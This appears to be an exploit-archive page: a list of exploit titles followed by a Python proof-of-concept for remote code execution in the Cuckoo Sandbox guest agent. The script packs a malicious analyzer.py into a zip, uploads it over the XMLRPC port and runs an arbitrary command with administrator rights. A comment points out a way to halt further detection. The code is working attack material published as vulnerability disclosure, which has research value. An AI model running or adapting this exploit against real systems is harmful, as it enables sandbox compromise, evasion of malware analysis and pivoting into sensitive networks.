f74a7dfb7e
13 new exploits Symantec Antivirus - Multiple Remote Memory Corruption Unpacking RAR Symantec Antivirus - Remote Stack Buffer Overflow in dec2lha Library Symantec Antivirus - Heap Overflow Modifying MIME Messages Symantec Antivirus - Integer Overflow in TNEF Decoder Symantec Antivirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink Symantec Antivirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow Windows 7 SP1 x86 - Privilege Escalation (MS16-014) Lenovo ThinkPad - System Management Mode Arbitrary Code Execution Exploit Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities WordPress Ultimate Membership Pro Plugin 3.3 - SQL Injection Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution Ubiquiti Administration Portal - CSRF to Remote Command Execution Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion
81 lines
No EOL
2.3 KiB
Python
Executable file
81 lines
No EOL
2.3 KiB
Python
Executable file
# -*- coding: utf8 -*-
|
|
"""
|
|
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
|
|
# Date: June 28th 2016
|
|
# Exploit Author: Rémi ROCHER
|
|
# Vendor Homepage: https://cuckoosandbox.org/
|
|
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
|
|
# Version: <= 2.0.1
|
|
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
|
|
# CVE : None
|
|
|
|
--[ NAME
|
|
|
|
Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
|
|
|
|
--[ DESCRIPTION
|
|
|
|
Cuckoo Sandbox is Free Software, basically used by researchers to analyze
|
|
(potential) malware behavior. It is also implemented industrially by
|
|
private companies for detecting potential threats within IT Networks
|
|
featuring dedicated so-called security appliances.
|
|
|
|
This basic Proof of Concept exploit is spawning a calc.exe process with
|
|
Administrator privileges, assuming:
|
|
* The Cuckoo agent.py is running with Admin privileges (should be
|
|
the case)
|
|
* The current user can access a local interface (should be the case)
|
|
* Optional for true Remote Code Execution: External equipment can
|
|
access the XMLRPC port (default 8000).
|
|
|
|
One may also call the complete() method in order to stop any further
|
|
detection
|
|
or screenshot.
|
|
|
|
Such vulnerabilities can be used to either trick the very detection
|
|
system, or
|
|
potentially escape the sandbox machine itself. An attacker could also
|
|
exploit
|
|
such bugs as a pivot in order to attack sensitive systems.
|
|
|
|
--[ AUTHORS
|
|
|
|
* Rémi ROCHER - Armature Technologies
|
|
* Thomas MARTHÉLY- Armature Technologies
|
|
|
|
--[ RESOURCE
|
|
* Repository: https://github.com/cuckoosandbox/cuckoo
|
|
|
|
|
|
"""
|
|
import xmlrpclib
|
|
from StringIO import StringIO
|
|
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED
|
|
|
|
|
|
def execute(x, cmd="cmd /c start"):
|
|
output = StringIO()
|
|
file = ZipFile(output, "w", ZIP_STORED)
|
|
info = ZipInfo("analyzer.py")
|
|
info.compress_type = ZIP_DEFLATED
|
|
|
|
content = ("""
|
|
import subprocess
|
|
|
|
if __name__ == "__main__":
|
|
subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)
|
|
|
|
""" % cmd)
|
|
file.writestr(info, content)
|
|
file.close()
|
|
|
|
data = xmlrpclib.Binary(output.getvalue())
|
|
|
|
if x.add_analyzer(data):
|
|
return x.execute()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
x = xmlrpclib.ServerProxy("http://localhost:8000")
|
|
execute(x, "calc.exe")
|
|
# x.complete() # Blackout mode |